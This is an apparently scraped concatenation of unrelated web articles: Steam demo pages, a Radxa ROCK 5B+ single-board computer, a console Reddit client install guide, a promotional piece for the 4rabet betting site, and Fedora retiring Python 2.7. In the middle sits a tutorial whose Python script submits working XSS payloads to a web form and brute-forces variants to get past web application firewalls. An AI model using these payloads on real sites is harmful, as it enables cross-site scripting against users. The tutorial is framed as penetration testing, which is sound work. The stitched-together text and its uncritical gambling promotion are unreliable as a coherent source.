Valve have overhauled the way game demos work on Steam in some big ways, and it sounds like a really good thing for both developers and players.
Announced on Steam, demos can now have their own full store page. This allows developers to accurately describe what the demo specifically offers, along with all the usual bits like trailers and screenshots. The demo page will also display a banner linking back to the full game.
This also means you can directly follow a demo page, to be notified when it’s actually live. Nice! It also gives players the ability to review the demo too.
Demos will also appear across Steam in various places, acting as if they’re a free game. So you can expect to see them in charts like New & Trending and across all the tags. This sounds good, but I imagine this will also increase the complaints from developers on their new releases being quickly pushed down by demo releases. Still, nice for players to find them easier.
Demos also have their behaviour tweaked for your Steam Library:

You can add demos to your library without having to immediately install them. Just click on the new “add to library” button next to demos you may not be ready to install (while using the mobile app, for instance).
Demos can be installed even if you already own the full game. Primarily, this will make it easier for developers to test demos, but it will also help players more easily manage installing/uninstalling demos.
Demos can be explicitly removed from an account by right-clicking > manage > remove from account.
When a demo is uninstalled, it will automatically get removed from your library.

Check out some demos on Steam.
Article taken from GamingOnLinux.com.

(Updated) Radxa Teases Upgraded ROCK 5B+ SBC with LPDDR5 RAM and Onboard Wi-Fi 6


Jul 22, 2024 — by Giorgio Mendoza


Radxa has introduced an upgraded version of their Radxa ROCK 5B, originally launched in 2022. This latest iteration of the single-board computer retains the Rockchip RK3588 SoC from its predecessors, now enhanced with significant upgrades including LPDDR5 RAM, dual M.2 M Key connectors, onboard Wi-Fi 6, among other features.

The ROCK 5B+, following its predecessors—the ROCK 5B and the ROCK 5B Blue Edition—continues to feature the Rockchip RK3588 SoC, comprising a quad-core Cortex-A76 CPU up to 2.4GHz and a quad-core Cortex-A55 at 1.8GHz.
The device includes an Arm Mali G610MC4 GPU, which supports a wide array of graphics and computational APIs including OpenGL ES 3.2, OpenCL 2.2, and Vulkan 1.2. It also features an NPU that supports multiple data types and is capable of performing up to 6 TOPS, useful for artificial intelligence tasks.

Use Python To Detect And Bypass Web Application Firewall


Web application firewalls are usually placed in front of the web server to filter malicious traffic coming towards the server. If you are hired as a penetration tester for some company and they forgot to tell you that they are using a web application firewall, then you might get into a serious mess. The figure below depicts the working of a simple web application firewall:

As you can see, it acts like a wall between web traffic and the web server. Nowadays, web application firewalls are usually signature based.

What is a signature based firewall?

In a signature based firewall you define signatures. As you know, web attacks follow similar patterns, or signatures. So we can define the matching patterns and block them. For example, consider this payload:

<svg><script>alert`1`<p>

The payload defined above is a kind of cross site scripting attack, and we know that all these attacks contain the substring "<script>". So why don't we define a signature that blocks web traffic if it contains this substring? We can define 2-3 signatures as shown below:

<script>
alert(*)

The first signature will block any request that contains the "<script>" substring, and the second one will block alert(any text). So, this is how a signature based firewall works.

How to know there is a firewall?

If you are performing a penetration test and you don't know that there is a firewall blocking the traffic, it can waste a lot of your time, because most of the time your attack payloads are being blocked by the firewall, not by the application code, and you might end up thinking that the application you are testing is secure and good to go. So it is a good idea to first test for the presence of a web application firewall before you start your penetration test.

Most firewalls today leave some tracks about themselves. If you attack a web application using the payload we defined above and get the following response:

HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1

Not Acceptable! An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

you can clearly see that your attack was blocked by the Mod_Security firewall. In this article we will see how we can develop a simple Python script that detects a firewall and tries to bypass it.

Step 1: Define HTML Document and PHP Script!
We will have to define an HTML document for injection of the payload and a corresponding PHP script to handle the data. We have defined both of them below.
We will be using the following HTML document:

<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

PHP Script:

<html>
<body>
Data from the form : <?php echo $_POST["data"]; ?><br>
</body>
</html>

Step 2: Prepare malicious request!
Our second step towards detecting the firewall's presence is creating a malicious cross site scripting request that can be blocked by the firewall. We will be using a Python module called 'Mechanize'; to know more about this module, please read the following article :

If you already know about Mechanize, you can skip reading the article. Now that you know about Mechanize, we can select the web form present on any page and submit the request. The following code snippet can be used to do that:

import mechanize as mec
maliciousRequest = mec.Browser()
formName = "waf"
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_form(formName)

Let's discuss this code line by line:

On the first line we've imported the mechanize module and given it the short name 'mec' for later reference.
To download a web page using mechanize, a browser instance is required; we did that on the second line of the code.
In the first step we defined our HTML document, in which the form name was 'waf'. We need to tell mechanize to select this form for submission, so we keep this name in a variable called formName.
Then we opened the URL, just like we would in a browser. After the page is opened we fill in the form and submit the data, so opening the page works the same way here.
Finally, we selected the form using the 'select_form' function, passing it the 'formName' variable.

As you can see in the HTML source code, this form has only one input field. We are going to inject our payload into that field, and once we receive the response we are going to inspect it for known strings to detect the presence of the web application firewall.

Step 3: Prepare the payload
In our HTML document we've specified one input field using this code:

<input type="text" name="data">

You can see that the name of this field is 'data'; we can use the following bit of code to define the input for this field:

crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
maliciousRequest.form['data'] = crossSiteScriptingPayLoad

The first line saves our payload in a variable.
The second line assigns the payload to the form field 'data'.

We can now safely submit this form and inspect the response.

Step 4: Submit the form and record Response
The code below will submit the form and record the response:

maliciousRequest.submit()
response = maliciousRequest.response().read()

print response

Submit the form.
Save the response in a variable.
Print the response back.

As I currently have no firewall installed, the payload is printed back to us in the response, which means no filtering is present in the application code, and in the absence of a firewall our request was also not blocked.
Step 5: Detect the Presence of firewall
The variable named 'response' contains the response we got from the server, and we can use it to detect the presence of a firewall. We will try to detect the presence of the following firewalls in this tutorial:

WebKnight.
Mod_Security.
Dot Defender.

Let's see how we can achieve this with Python code:

if response.find('WebKnight') >= 0:
    print "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0:
    print "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
    print "Firewall detected: Dot Defender"
else:
    print "No Firewall Present"

If the WebKnight firewall is installed and our request got blocked, the response string will contain 'WebKnight' somewhere inside it, so the find function will return a value of 0 or greater, which means the WebKnight firewall is present. Similarly, we can check for the other two firewalls as well.
We can extend this small application to detect as many firewalls as we like, but we must know their response behaviour.

Using Brute force to bypass Firewall filter
I've mentioned at the start of the article that firewalls these days mostly block requests based on signatures. But there are hundreds and thousands of ways you can construct a payload; JavaScript is becoming more complex day by day. We can make a list of payloads, try each of them, record each response and check whether we were able to bypass the firewall or not. Please note that if the firewall rules are well defined, this approach might not work. Let's see how we can brute force using Python:

listofPayloads = ['<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="&#1;javascript:alert(1)">CLICK ME<a>']
for payLoads in listofPayloads:
    maliciousRequest = mec.Browser()
    formName = "waf"
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_form(formName)
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submit()
    response = maliciousRequest.response().read()
    if response.find('WebKnight') >= 0:
        print "Firewall detected: WebKnight"
    elif response.find('Mod_Security') >= 0:
        print "Firewall detected: Mod Security"
    elif response.find('dotDefender') >= 0:
        print "Firewall detected: Dot Defender"
    else:
        print "No Firewall Present"

On the first line we've defined a list of 3 payloads; you can extend this list and add as many payloads as you require.
Then, inside the for loop, we repeat the same process as above, but this time for each payload in the list.
Upon receiving the response we again compare it to see if a firewall is present or not.

As I had no firewall installed, my output reported no firewall present for each payload.

Convert HTML Tags to Unicode or Hex Entities
If, for example, the firewall is filtering HTML tags like <, >, we can send their corresponding Unicode or hex entities and see if they are being converted to their original form. If so, this could be an entry point as well. The code below can be used to examine this process:

listofPayloads = ['&lt;b&gt;', '\u003cb\u003e', '\x3cb\x3e']
for payLoads in listofPayloads:
    maliciousRequest = mec.Browser()
    formName = "waf"
    maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
    maliciousRequest.select_form(formName)
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submit()
    response = maliciousRequest.response().read()
    print "---------------------------------------------------"
    print response
    print "---------------------------------------------------"

Each time we send an encoded entry and then examine the response to see whether it got converted or was printed back without conversion. When I ran this code, none of the encoded entries were converted to their original form.

Conclusion
The purpose of this article was to train you in advance so that you can penetration-test your own firewall before a hacker does. It is always a good idea to self-test your network infrastructure for vulnerabilities, because our first concern is usually to get the application up and running, and we overlook the security part. But it must not be overlooked, because later it can become a huge headache.
The complete source code can be downloaded from this link.

Author Info:
Usman Nasir, founder and author of Cyberpersons, is a Computer Science student who has worked as technical support staff at various hosting companies and loves to write about Linux and web application security.

Using Reddit from the console in 2020 — The Ultimate Linux Newbie Guide

tuir

I’m going to horrify thousands of people out here when I say: I think reddit sucks. Specifically, I hate how horrid it looks. And yes, that’s after the new ‘facelifted’ reddit! The other day, I wanted to print out a page of comments from a subreddit. Before you tell me that it’s 2020 and I shouldn’t be printing stuff out anyway, I agree. But for this one exercise, it was really handy to have a printout. No matter what reader view plugin I used, or PDF conversion tool I opted for, the outcome was the same: either the reader couldn’t parse the page at all, or upon switching to classic view, I got a little more and I could at least print a page with Ctrl+P. Either way, it came out all over the place.
Most of the times with reddit, I pretty much just want the text. In fact, like many of you, I work at the command line for many hours of the day, so having a reddit client that would work on the command-line, and could also format the text in a completely readable way sounds pretty slick. Some of you may be aware of the CLI/curses based tool called RTV. Unfortunately the author decided to abandon the client some time back in 2019, so for a while, we’ve been without an up to date Linux command-line client. Have no fear, however. Based upon the look-and-feel of the RTV client comes TUIR (Terminal UI for Reddit) and TTRV (Tilde Terminal Reddit Viewer). At the moment, both apps are pretty much identical, so take your pick.
RTV is still available in the Ubuntu repositories, however I'm not sure how long that will last, but at least for now, you can simply sudo apt install rtv. Fortunately, installation of TTRV or TUIR is trivial too. Simply do the following (the commands are collected in a block after the list):
1) clone the git repo (e.g. git clone https://gitlab.com/ajak/tuir.git )
2) cd into the cloned directory (e.g. cd tuir)
3) run python3 setup.py install
4) run the binary, e.g. 'tuir' at the command prompt.
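
Put together, the whole installation looks like this:

git clone https://gitlab.com/ajak/tuir.git
cd tuir
python3 setup.py install
tuir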

It looks pretty good. I’m happy with it, and making this grumpy old man happy is a big thing these days!
Finally, there is also an older app called Cortex, which I’m unsure if it’s being maintained any more, but it still has promise, if you want to try something else. Check out the Git Repo here.
Enjoy!

A Journey from Inception to Prominence


Since its inception, https://4rabet-sport.com/ has undergone a remarkable evolution, transforming from a fledgling betting platform into a prominent player in the online gambling industry. This journey, marked by key milestones, innovative strategies, and a steadfast commitment to excellence, has propelled 4rabet to the forefront of the betting world.

Founding and Early Growth
Founded on the principles of innovation and customer satisfaction, 4rabet began its journey with a vision to revolutionize the online betting experience. In its early days, the platform focused on building a robust infrastructure, forging strategic partnerships, and establishing a strong foothold in the competitive betting market. Through relentless dedication and a customer-centric approach, 4rabet quickly gained traction among bettors seeking a reliable and immersive betting platform.

Innovations and Advancements
Central to 4rabet's success has been its commitment to innovation and continuous improvement. The platform has consistently pushed the boundaries of what is possible in online betting, introducing cutting-edge features and functionalities to enhance the user experience. From intuitive interfaces and mobile optimization to live betting options and personalized recommendations, 4rabet has remained at the forefront of technological innovation, setting new standards for excellence in the industry.

Expansion and Global Reach
As 4rabet continued to grow and expand its offerings, it also embarked on a journey of global expansion, reaching new markets and audiences around the world. Through strategic partnerships and targeted marketing initiatives, 4rabet has successfully penetrated diverse geographical regions, cementing its position as a global leader in the betting industry. Today, 4rabet boasts a widespread presence, catering to the diverse needs and preferences of bettors across continents.

Commitment to Excellence
Unwavering commitment to excellence in all aspects of operations.
Prioritization of customer service and user experience.
Emphasis on security and responsible gambling practices.
Fostering a culture of transparency, integrity, and accountability.
Trust and loyalty earned from millions of bettors worldwide.
Solidification of reputation as a trusted and reputable betting platform.

Looking Ahead
Image by user15245033 on Freepik
As 4rabet continues to evolve and adapt to the ever-changing landscape of the betting industry, the future holds exciting possibilities and opportunities for growth. With a relentless focus on innovation, customer satisfaction, and responsible gambling, 4rabet is poised to build upon its past successes and further solidify its position as a leader in the online betting market. As the journey of 4rabet unfolds, bettors can expect a continued commitment to excellence and a dedication to providing an unparalleled betting experience for years to come.

FAQs
What distinguishes 4rabet from other betting platforms?
4rabet stands out from its competitors with its user-friendly interface, diverse range of sports markets, and innovative features such as live betting options and personalized recommendations. Additionally, 4rabet prioritizes responsible gambling initiatives, ensuring a safe and enjoyable betting experience for all users.

How does 4rabet ensure the security of user data and transactions?
4rabet employs state-of-the-art encryption technology and robust security protocols to safeguard user data and transactions. The platform undergoes regular audits and adheres to stringent regulatory standards to maintain the highest levels of security and compliance.

What support options are available for users on 4rabet?
4rabet offers comprehensive customer support options, including live chat, email support, and a detailed FAQ section, to assist users with any queries or issues they may encounter. Additionally, the platform provides resources and links to support organizations for users who may need assistance with responsible gambling practices.

Fedora 41 Finally Retires Python 2.7


“After sixteen years since the introduction of Python 3, the Fedora project announces that Python 2.7, the last of the Python 2 series, will be retired,” according to long-time Slashdot reader slack_justyb. From the announcement on the Fedora changes page: The python2.7 package will be retired without replacement from Fedora Linux 41. There will be no Python 2 in Fedora 41+ other than PyPy. Packages requiring python2.7 on runtime or buildtime will have to deal with the retirement or be retired as well. “This also comes with the announcement that GIMP 3 will be coming to Fedora 41 to remove any last Python 2 dependencies,” adds slack_justyb. GIMP 2 was originally released on March 23, 2004.

GIMP will be updated to GIMP 3 with Python 3 support. Python 2 dependencies of GIMP will be retired. Python 2’s end of life was originally 2015, but was extended to 2020. The Python maintainers close with this:

The Python maintainers will no longer regularly backport security fixes to Python 2.7 in RHEL, due to the end of maintenance of RHEL 7 and the retirement of the Python 2.7 application stream in RHEL 8. We provided this obsolete package for 5 years beyond its retirement date and will continue to provide it until Fedora 40 goes end of life. Enough has been enough.